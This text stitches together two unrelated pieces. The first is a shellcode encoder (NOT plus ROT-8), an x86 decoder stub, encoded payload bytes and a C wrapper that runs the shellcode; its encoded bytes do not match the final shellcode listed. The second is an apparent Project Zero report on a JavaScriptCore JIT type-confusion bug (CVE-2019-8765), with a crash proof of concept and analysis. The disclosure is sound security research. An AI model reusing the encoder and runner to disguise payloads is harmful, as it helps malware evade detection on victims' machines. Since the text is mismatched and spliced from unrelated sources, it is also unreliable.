for x in bytearray(shellcode) :
        # NOT encoding 
        y = ~x

        # ROT 8 encoding
        h  = (y + rot)%256

        encoded += '\\x'
        encoded += '%02x' % (h & 0xff)

        encoded2 += '0x'
        encoded2 += '%02x,' %(h & 0xff)


print encoded

print encoded2

print 'Len: %d' % len(bytearray(shellcode))

#---------------------- Assembly Code ------------------------------------------#


global _start

section .text
_start:
        jmp short call_shellcode

decoder:
        pop esi
        xor ecx, ecx
        mov cl, 25


decode:

        sub byte [esi], 8
        not byte [esi]
        inc esi
        loop decode

        jmp short EncodedShellcode

call_shellcode:

        call decoder

        EncodedShellcode: db 0xd6,0x47,0xb7,0x9f,0xd8,0xd8,0x94,0x9f,0x9f,0xd8,0xa5,0x9e,0x99,0x7e,0x24,0xb7,0x7e,0x25,0xb4,0x7e,0x26,0x57,0xfc,0x3a,0x87

#------------------------- final shellcode ----------------------------------------#

unsigned char buf[] = 


"\xeb\x0f\x5e\x31\xc0\xb0\x19\x80\x2e\x08\xfe"
"\xc8\x74\x08\x46\xeb\xf6\xe8\xec\xff\xff\xff"
"\x39\xc8\x58\x70\x37\x37\x7b\x70\x70\x37\x6a"
"\x71\x76\x91\xeb\x58\x91\xea\x5b\x91\xe9\xb8"
"\x13\x88";

#------------------------- C wrapper --------------------------------------------------# 

#include<stdio.h>
#include<string.h>

unsigned char code[] = \

"\xeb\x0f\x5e\x31\xc0\xb0\x19\x80\x2e\x08\xfe"
"\xc8\x74\x08\x46\xeb\xf6\xe8\xec\xff\xff\xff"
"\x39\xc8\x58\x70\x37\x37\x7b\x70\x70\x37\x6a"
"\x71\x76\x91\xeb\x58\x91\xea\x5b\x91\xe9\xb8"
"\x13\x88";


int main()
{

        printf("Shellcode Length:  %d\n", strlen(code));
        int (*ret)() = (int(*)())code;
        ret();

}

JSC: GetterSetter type confusion during DFG compilation

The following JavaScript program, found by Fuzzilli and slightly modified, crashes JavaScriptCore built from HEAD and the current stable release (/System/Library/Frameworks/JavaScriptCore.framework/Resources/jsc):

    let notAGetterSetter = {whatever: 42};

    function v2(v5) {
        const v10 = Object();
        if (v5) {
            const v12 = {set:Array};
            const v14 = Object.defineProperty(v10,\"length\",v12);
            const v15 = (140899729)[140899729];
        } else {
            v10.length = notAGetterSetter;
        }
        const v18 = new Uint8ClampedArray(49415);
        v18[1] = v10;
        const v19 = v10.length;
        let v20 = 0;
        while (v20 < 100000) {
            v20++;
        }
    }
    const v26 = v2();
    for (let v32 = 0; v32 < 1000; v32++) {
        const v33 = v2(true);
    }

    /*
    Crashes with:
    ASSERTION FAILED: from.isCell() && from.asCell()->JSCell::inherits(*from.asCell()->vm(), std::remove_pointer<To>::type::info())
    ../../Source/JavaScriptCore/runtime/JSCast.h(44) : To JSC::jsCast(JSC::JSValue) [To = JSC::GetterSetter *]
    1   0x1111ada79 WTFCrash
    2   0x1111ada99 WTFCrashWithSecurityImplication
    3   0x10ffb8f55 JSC::GetterSetter* JSC::jsCast<JSC::GetterSetter*>(JSC::JSValue)
    4   0x10ffaf820 JSC::DFG::AbstractInterpreter<JSC::DFG::InPlaceAbstractState>::executeEffects(unsigned int, JSC::DFG::Node*)
    5   0x10ff9f37b JSC::DFG::AbstractInterpreter<JSC::DFG::InPlaceAbstractState>::execute(unsigned int)
    6   0x10ff9def2 JSC::DFG::CFAPhase::performBlockCFA(JSC::DFG::BasicBlock*)
    7   0x10ff9d957 JSC::DFG::CFAPhase::performForwardCFA()
    8   0x10ff9d647 JSC::DFG::CFAPhase::run()
    9   0x10ff9cc61 bool JSC::DFG::runAndLog<JSC::DFG::CFAPhase>(JSC::DFG::CFAPhase&)
    10  0x10ff6c65b bool JSC::DFG::runPhase<JSC::DFG::CFAPhase>(JSC::DFG::Graph&)
    11  0x10ff6c625 JSC::DFG::performCFA(JSC::DFG::Graph&)
    12  0x110279031 JSC::DFG::Plan::compileInThreadImpl()
    13  0x110274fa6 JSC::DFG::Plan::compileInThread(JSC::DFG::ThreadData*)
    14  0x11052a9bb JSC::DFG::Worklist::ThreadBody::work()
    15  0x1111b3c69 WTF::AutomaticThread::start(WTF::AbstractLocker const&)::$_0::operator()() const
    16  0x1111b38a9 WTF::Detail::CallableWrapper<WTF::AutomaticThread::start(WTF::AbstractLocker const&)::$_0, void>::call()
    17  0x1102c433a WTF::Function<void ()>::operator()() const
    18  0x1111f0350 WTF::Thread::entryPoint(WTF::Thread::NewThreadContext*)
    19  0x111285525 WTF::wtfThreadEntryPoint(void*)
    20  0x7fff5a7262eb _pthread_body
    21  0x7fff5a729249 _pthread_start
    22  0x7fff5a72540d thread_start
    */

The assertion indicates that a JSCell is incorrectly downcasted to a GetterSetter [1] (a pseudo object used to implement property getters/setter). In non debug builds, a type confusion then follows.

Below is my preliminary analysis of the cause of the bug.

The function v2 is eventually JIT compiled by the FTL JIT compiler. Initially, it will create the following (pseudo) DFG IR for it:

# Block 0 (before if-else):
  44: NewObject(...)
<jump to block 1 or 2 depending on v5>

# Block 1 (the if part):
  ... <install .length property on @44>
  // Code for const v15 = (140899729)[140899729];
  ForceOSRExit
  Unreachable

# Block 2 (the else part)
  PutByOffset @44, notAGetterSetter
  PutStructure

# Block 3 (after the if-else):
  ...
  // Code for v10.length. Due to feedback from previous executions, DFG
  // JIT speculates that the if branch will be taken and that it will see
  // v10 with a GetterSetter for .length here
  CheckStructure @44, structureWithLengthBeingAGetterSetter
  166: GetGetterSetterByOffset @44, .length         // Load the GetterSetter object from @44
  167: GetGetter @166                               // Load the getter function from the GetterSetter
  ...


Here, the end of block 1 has already been marked as unreachable due to the element load from a number which will always cause a bailout.

Later, the global subexpression elimination phase [2] runs and does the following (which can be seen by enabling verbose CSE [3]):

* It determines that the GetGetterSetterByOffset node loads the named property from the object @44
* It determines that this property slot is assigned in block 2 (the else block) and that this block strictly dominates the current block (meaning that the current block can only be reached through block 2)
    * This is now the case as block 1 does a bailout, so block 3 can never be reached from block 1
* As such, CSE replaces the GetGetterSetterByOffset operation with the constant for |notAGetterSetter| (as that is what is assigned in block 2).

At this point the IR is incorrect as the input to a GetGetter operation is expected to be a GetterSetter object, but in this case it is not. During later optimizations, e.g. the AbstractInterpreter relies on that invariant and casts the input to a GetterSetter object [4]. At that point JSC crashes in debug builds with the above assertion. It might also be possible to trigger the type confusion at runtime instead of at compile time but I have not attempted that.

Please note: this bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public.


[1] https://github.com/WebKit/webkit/blob/87064d847a0f1b22a9bb400647647fe4004a4ccd/Source/JavaScriptCore/runtime/GetterSetter.h#L43
[2] https://github.com/WebKit/webkit/blob/87064d847a0f1b22a9bb400647647fe4004a4ccd/Source/JavaScriptCore/dfg/DFGCSEPhase.h#L49
[3] https://github.com/WebKit/webkit/blob/87064d847a0f1b22a9bb400647647fe4004a4ccd/Source/JavaScriptCore/dfg/DFGCSEPhase.cpp#L51
[4] https://github.com/WebKit/webkit/blob/87064d847a0f1b22a9bb400647647fe4004a4ccd/Source/JavaScriptCore/dfg/DFGAbstractInterpreterInlines.h#L2811


Related CVE Numbers: CVE-2019-8765.



Found by: saelo@google.com